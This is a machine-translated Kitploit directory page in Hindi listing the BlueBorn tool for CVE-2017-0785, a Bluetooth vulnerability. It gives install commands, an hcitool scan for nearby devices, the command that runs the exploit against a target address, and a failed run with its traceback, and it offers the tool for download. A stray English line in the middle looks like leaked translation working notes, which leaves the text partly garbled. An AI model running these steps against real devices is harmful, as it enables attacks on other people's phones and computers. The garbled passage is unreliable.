Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
BlueBorn — CVE-2017-0785 | Kitploit
उपकरण/GitHubGitHub/sh4rknado/blueborn
ब्लूटूथ सुरक्षाभेद्यता विश्लेषणशोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsh4rknado/blueborn

BlueBorn

CVE-2017-0785

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

should start with "# BlueBorn" then newline, "CVE-2017-0785", etc.

I'll write the translated headings and keep everything else.# BlueBorn CVE-2017-0785

आर्क लिनक्स स्थापना

paru -S python-pybluez-git bluez-utils-compat pyhton3 python3-pip

sudo pip install pwn

ट्यूटोरियल

खोज

root@kitploit:~
hcitool scan
Scanning ...
      XX:XX:XX:XX:XX:XX       Device 1
      XX:XX:XX:XX:XX:XX       Device 2

एक्सप्लॉइट का उपयोग करें

root@kitploit:~
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX

[V] Exploit: Done!


 python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX ==> FAILED EXEMPLE

[◒] Exploit: Connecting to target

Traceback (most recent call last):

File "<string>", line 3, in connect

_bluetooth.error: (110, 'Connection timed out')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

File "/opt/Hacking-tools/Bluetooth/CVE-2017-0785/CVE-2017-0785.py", line 31, in <module>

  sock.connect((target, 1))

File "<string>", line 5, in connect

bluetooth.btcommon.BluetoothError: [Errno 110] Connection timed out
टूल डाउनलोड करें